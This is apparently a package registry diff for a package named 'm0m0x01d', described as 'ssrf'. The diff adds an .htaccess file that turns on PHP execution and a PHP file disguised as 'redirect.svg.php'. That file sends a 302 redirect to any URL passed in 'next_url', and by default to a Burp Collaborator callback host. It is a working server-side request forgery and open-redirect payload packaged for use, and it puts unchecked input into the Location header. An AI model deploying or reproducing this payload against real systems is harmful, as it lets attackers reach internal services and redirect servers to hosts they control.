m0m0x01d 4.0.0 → 6.0.0

Sign up to get free protection for your applications and to get access to all the features.
Files changed (3) hide show
  1. package/.htaccess +8 -0
  2. package/package.json +1 -1
  3. package/redirect.svg.php +21 -0
package/.htaccess ADDED
@@ -0,0 +1,8 @@
1
+ <IfModule mod_php.c>
2
+ # Enable PHP execution
3
+ AddType application/x-httpd-php .php
4
+ AddHandler application/x-httpd-php .php
5
+ </IfModule>
6
+
7
+ # Ensure the PHP engine is enabled
8
+ php_flag engine on
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "m0m0x01d",
3
- "version": "4.0.0",
3
+ "version": "6.0.0",
4
4
  "description": "ssrf",
5
5
  "main": "index.html",
6
6
  "scripts": {
package/redirect.svg.php ADDED
@@ -0,0 +1,21 @@
1
+ <?php
2
+ // Get the target URL from the 'next_url' query parameter
3
+ $next_url = isset($_GET['next_url']) ? $_GET['next_url'] : 'https://9lv13zw73wdy5t6hjxcpw5tz9qfh36.burpcollaborator.net';
4
+
5
+ // Set the appropriate headers for the 302 redirect
6
+ header("HTTP/1.1 302 Found");
7
+ header("Location: $next_url");
8
+
9
+ // Optional: Set additional headers if required
10
+ header("Cache-Control: public, max-age=0");
11
+ header("Set-Cookie: sites=; expires=Thu, 01 Jan 1970 00:00:00 GMT; Max-Age=0; Path=/");
12
+ header("Set-Cookie: sessionid=; expires=Thu, 01 Jan 1970 00:00:00 GMT; Max-Age=0; Path=/");
13
+ header("Strict-Transport-Security: max-age=31536000; includeSubDomains; preload");
14
+ header("X-Frame-Options: SAMEORIGIN");
15
+ header("X-XSS-Protection: 1; mode=block");
16
+ header("X-Content-Type-Options: nosniff");
17
+ header("Content-Security-Policy: frame-ancestors 'self'; base-uri 'self'; form-action 'self' https://*.example.com; upgrade-insecure-requests");
18
+
19
+ // Ensure the connection is closed after the headers
20
+ exit();
21
+